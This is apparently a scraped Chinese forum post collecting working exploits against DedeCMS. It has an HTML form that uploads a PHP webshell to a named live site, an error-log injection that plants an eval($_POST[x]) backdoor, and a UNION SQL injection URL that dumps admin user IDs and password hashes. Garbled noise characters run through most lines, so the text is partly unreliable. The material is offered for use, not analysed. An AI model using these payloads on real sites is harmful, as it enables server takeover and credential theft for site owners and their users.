' q# g \. D! b2 l' {: d---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />7 f8 O% [2 U& d& u A" y) V5 C
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>- ]! Z4 r7 ?0 x! d$ E
<input type='hidden' name='activepath' value='/data/cache/' />
8 e7 F$ {6 }% e$ F<input type='hidden' name='cfg_basedir' value='../../' />
7 a1 _# ]$ w! h<input type='hidden' name='cfg_imgtype' value='php' />: Q) b* c1 ^! K$ y
<input type='hidden' name='cfg_not_allowall' value='txt' />
1 J) v2 ^! |2 [ f A/ P<input type='hidden' name='cfg_softtype' value='php' />6 u0 L+ Q5 A9 n! Z5 Z- A. f
<input type='hidden' name='cfg_mediatype' value='php' />2 a4 o* v% Y* j! x! f
<input type='hidden' name='f' value='form1.enclosure' />
6 n& S8 F: Y0 J: g2 U! N: C<input type='hidden' name='job' value='upload' />
4 @8 q! X6 |, j. g R<input type='hidden' name='newname' value='fly.php' />6 w7 @. U4 Y. b
Select U Shell <input type='file' name='uploadfile' size='25' />- ~7 E5 y) Z6 q) x j( ?! S f
<input type='submit' name='sb1' value='确定' />
% A9 u6 K* c1 R# }3 E+ e; n</form> z v" C7 @# b) I4 C8 c! U6 B/ F9 J
<br />It's just a exp for the bug of Dedecms V55...<br />7 E2 z( [' a. F* A Q) s0 u
Need register_globals = on...<br />
3 f; M! ]3 X' S$ E9 BFun the game,get a webshell at /data/cache/fly.php...<br />2 j) o1 _# f; p# F3 ^ I$ ?
</body>
, ]8 j: E% P* ~9 i</html>
+ j) ?: M6 |) P8 J5 w- a( g
* W. i, u+ p8 w7 w# l2 Q7 \" D6 G e* A/ R3 l( T0 s% n
2 D6 w2 C8 k. b1 i
+ p2 u6 |$ T- r E4 V/ Z
% N, G. l6 c( {
& k; |2 K$ s+ D( s8 z$ I
: U' K" }- O* I& l7 v: {8 z
) g; u. {: c+ u. c1 l) h1 [. g3 w
* j( k' D* R$ B0 C- a9 S' D) F$ m9 E( {' ?
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞, F5 }2 Z( I0 g" _; E. O
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
* u: n( L- H4 L* w+ l ]1. 访问网址:" A) X* C. y/ b: t; r0 y
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
/ e' o; m' @, j* j: i可看见错误信息2 P# w; s8 _# e$ Z7 y( \" A+ n
9 s8 U$ K: E0 Y3 U( `; g1 V
& R) N; A" \% k! W
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。% D% {% K8 O9 k! Z
int(3) Error: Illegal double '1024e1024' value found during parsing
% d# T& N1 y3 k$ |$ v; aError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
, f0 T5 u5 X( s9 e$ }+ g
8 f, i, f- n( Q3 P. Y ^$ m3 j8 { i& Y/ { f4 U- w
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
: y6 f1 v& o4 O! c" a. ]2 A1 A* | ^ d& y- M7 h7 H
/ Q# P5 e. o1 d+ S% h9 j5 e+ }8 p G1 D<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
% K& g! e; f" j
9 m }' X* e5 L
a) [& e9 S, D2 [按确定后的看到第2步骤的信息表示文件木马上传成功.. g4 S; C/ }4 C( i5 X. x
1 T! Q6 H# Q! y: C* h7 _% p& `/ q! {; R5 Z, w G
& u) W4 ~6 g1 M- h# }5 b
1 b4 g4 o0 J Q- i4 `" g/ s& f4 e" j, r2 O1 [
, n# s; d/ J8 [- B, Z% s( B7 b3 R) H+ C
0 l# R+ H: d0 v
7 ]4 u$ ?; N; Y4 S
5 r- ^1 p3 R' |1 Z1 X! b
# D! O3 d# L+ t, n& } L! N
* s% F: j6 G3 u) B织梦(DedeCms)plus/infosearch.php 文件注入漏洞
* k+ T/ ^# C( i8 u7 Ghttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对